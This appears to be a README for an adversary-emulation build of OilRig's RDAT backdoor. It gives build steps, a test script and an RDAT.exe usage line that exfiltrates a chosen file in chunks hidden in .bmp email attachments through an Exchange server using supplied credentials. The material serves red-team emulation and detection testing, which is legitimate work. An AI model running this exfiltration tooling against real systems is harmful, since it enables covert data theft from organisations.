RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.[1][2] This emulated version of RDAT will leverage the EWS API by loading Microsoft.Exchange.WebServices.dll. It will connect to the EWS email server and send emails with a .bmp that contains chunks of data from given file to be exfiltrated.

Microsoft.Exchange.WebServices.dll is not included by default in this repository. Follow Microsoft's documentation for retrieving the DLL from an existing installation of Exchange or for using the open source EWS Managed API. The DLL should be placed in Resources/RDAT for building the RDAT executable.

NOTE: Tests and usage assume an Exchange server has been configured for the environment and should be run from a domain joined Windows host with network access to the Exchange server. This implementation also expects a username and passowrd for a configured user that can authenticate to the Exchange server.

https://dotnet.microsoft.com/en-us/download/dotnet/6.0

Open a command (cmd.exe) prompt

# from \Resources\RDAT\

dotnet publish -c Release -r win10-x64 -p:PublishSingleFile=true /p:DebugType=None /p:DebugSymbols=false
cd .\bin\Release\net6.0\win10-x64\publish\

The compiled binary should be copied to Resources\payloads\TwoFace for Step 8 and 10.

Open a command (cmd.exe) prompt

# from \Resources\RDAT\

powershell.exe .\test.ps1 [user] [password] [domain] [server_address] # Order has to be exact
# Example: powershell.exe .\test.ps1 user_account 1234567 domain.com 10.0.0.1

Go to running directory of RDAT.exe

.\RDAT.exe --help
.\RDAT.exe --path="C:\Users\Public\FileToBeExfiltrated.txt" --from="user_account@domain.com" --password="1234567" --to="recipient@domain.com" --server="10.0.0.1" --chunksize="20000" 

Go to running directory of RDAT.exe

rm .\RDAT.exe
rm .\guest.bmp
rm .\guest.bmp.tmp

[1] https://attack.mitre.org/software/S0495/ [2] https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/